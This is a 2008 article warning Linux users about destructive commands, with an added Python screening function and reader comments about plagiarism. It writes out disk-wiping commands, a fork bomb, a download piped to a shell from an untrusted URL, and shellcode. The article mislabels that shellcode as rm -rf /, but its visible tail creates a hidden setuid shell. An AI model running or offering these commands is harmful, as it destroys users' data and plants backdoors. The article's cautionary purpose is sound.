Seven Deadliest Linux Commands

Nov 21, 2008

On the TechSource blog, Philippine technology student Jun Auza has assembled a list of the seven deadliest Linux commands, which his readers promptly augmented.

Auza warns new forum and chat participants not to fall into the trap of calling each other "dumbheads."

CAUTION! All commands included in the blog and shown here actually destroy a complete Linux system. Those wishing to try them should do so on a separate virtual machine. Please proceed at your own risk!

The first, classic deadly command is certainly:

rm -rf /

The command starts at root and will forcefully delete all files recursively. The result: the hard disk and all relevant files are wiped out.

A corollary to the first deadly command is its hex equivalent:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

According to Auza, this hex-encoded version of rm -rf / can "deceive even the rather experienced Linux users."

A deletion that might proceed somewhat faster than a complete hard disk wipeout is:

mkfs.ext3 /dev/sda

The command will do horrible things to sda.

If losing data weren't bad enough, consider this command:

:(){ :|:& };:

It executes enough processes to freeze your system and completely corrupt your data. It is also known as the "forkbomb." Should you use the command in a startup script, at least a system message will mitigate the effect.

Back to the hard disk, with this command:

any_command > /dev/sda

The any_command can be for a favorite program that might output some terminal data, but in this case it writes it to the sda hard disk. As a rule, all data will span partitions and the entire filesystem will cross the River Styx.

Even Linux has so-called rootkits, malware that takes control of root and transforms the PC into an unwilling zombie. All you need is some_untrusted_source on the Web and use wget on it:

wget http://some_untrusted_source -O- | sh

The command certainly invites trouble from the untrusted URL in the way of possible rootkits with malicious code.

The last of the seven deadliest commands Auza calls the /dev/null trick:

mv /home/my_home_directory/* /dev/null

Everything you move to /dev/null, such as your favorite home directory, will end up in the Big Garbage Heap.

As the responses to the blog steadily grow, many additional ways to destroy your Linux system are beginning to emerge. A prominent one is:

dd if=/dev/urandom of=/dev/sda

This fills the sda disk with random numbers. Oh joy!

Users should be especially wary of requests involving root privileges, the rm -rf or dd commands, redirection (via "|" and ">"), or using a hard disk (such as /dev/sda) as a parameter.
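The warning signs in the paragraph above can be checked mechanically before a pasted command is ever run. The following screen is an added example, not code from Auza's blog or from the article; the flag names and the `risk_flags` function are assumptions made for illustration, and the check only parses text without executing anything.

```python
import re
import shlex

# Disk and partition device nodes: /dev/sda, /dev/sdb1, /dev/vda, /dev/nvme0n1p1 ...
DISK = re.compile(r"(^|=)/dev/(sd[a-z]+|hd[a-z]+|vd[a-z]+|nvme\d+n\d+)(p?\d+)?$")
SHELLS = {"sh", "bash", "dash", "zsh"}
SEPARATORS = {"|", "||", "&&", ";", "&"}


def tokenize(line):
    """Split like a POSIX shell: quoted text stays one token, operators stand alone."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def risk_flags(line):
    """Return the article's warning signs found in one pasted command line."""
    flags, current, rm_opts = set(), None, set()
    at_start, piped = True, False
    for tok in tokenize(line):
        if tok in SEPARATORS:
            if tok == "|":
                flags.add("pipe")
            at_start, piped = True, tok == "|"
            continue
        if tok in (">", ">>"):
            flags.add("redirect")
            continue
        if DISK.search(tok):
            flags.add("disk-device")  # covers both `/dev/sda` and `of=/dev/sda`
        if at_start:
            name = tok.rsplit("/", 1)[-1]
            if name in ("sudo", "su"):
                flags.add("root")
                continue  # simplification: treat the next word as the command
            current, rm_opts, at_start = name, set(), False
            if name == "dd":
                flags.add("dd")
            if piped and name in SHELLS:
                flags.add("pipe-to-shell")
            piped = False
        elif current == "rm" and tok.startswith("-") and not tok.startswith("--"):
            rm_opts |= set(tok[1:].replace("R", "r"))  # -rf, -fr, -R -f all count
            if {"r", "f"} <= rm_opts:
                flags.add("rm -rf")
    return flags
```

The /dev/null trick from the list raises none of these flags, which shows the limits of a keyword rule of thumb: an empty result means "no listed warning sign", not "safe".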

Comments

  • jdong

    The language is similar because it contains a lot of *terminology* and *stock phrases*. The author is guilty of writing unimaginative prose, not plagiarism. *You're* guilty of having a proprietary attitude and seeking to claim some kind of ownership of a few *not very obscure!* commands and tricks. Who are you, Billy G? Did you patent that forkbomb? Maybe you have IP rights over the word clobber (man wget)? You can pull this lamer nonsense at ubuntuforums but away from there you don't get to moderate comments, delete posts or come over as a big shot. You are a muppet.
  • Even more deadly

    I've come across an even more deadly command...

    $ source ~/.bash_history

    Well, how would you clean up THIS mess you just made?
  • data protection

    I keep my / /home and even my personal files on separate partitions. What's more, my important data lives on two external drives. If you have data you can't afford to lose or simply choose not to, it is relatively simple to prevent it. The only way I lose all my data is if my house burns down (knock on wood).
  • Not really that dangerous....

    An operating system that actually does what people ask it to do? I don't see what's wrong with that.

    Mind you, people would need to be signed in as root for these commands to do any significant damage (sudo or su will do), but as I keep saying to people, if they don't backup data they deserve to lose it.

    Dad just lost 4 years of digital photos from a HDD crash--no funny commands there, and had prior to that his system plagued by virii before switching to GNU/Linux.

    Other than that, great article!
  • stolen indeed

    I don't mind people using content from the forums but as mentioned, all of the content is under a CC license. The examples are used in mostly the same order, and a lot of the wording choices are the same. Considering how the exact same examples were used, I find that hard to dismiss as a coincidence. The original version also had the assertion that "rm -rf .*" matches ../ and recurses upwards to destroy parent directories, which I purposely put in the original announcement to see if readers were paying attention. After 20 comments on the blog pointing out that it was incorrect, it looks like that command has been removed.


    Not convinced? Let's look at a quick side-by-side:


    Blog:
    Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.

    UF announcement:
    Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.

    Blog:
    With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

    UF announcement:
    Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data.




    If you think this wording choice is similar only by coincidence, then fine.
  • not stolen

    It isn't "stolen". It merely contains the same commands. Do the ubuntuforums moderators (lamers) claim proprietary rights to shell commands? Idiots. The English text is different; different structure, phrases etc. Not just a little different, but entirely dissimilar, obviously original and not plagiarised. Nobody copied your lame post so stop p*ssing your pants and stick to bullying people on your crappy forum.
  • Stolen from UbuntuForums announcement

    This blog post is mostly stolen from http://ubuntuforums.org/announcement.php?f=326, which is cc-by-sa. The wording is similar, the commands are similar, and the mistakes are similar, too.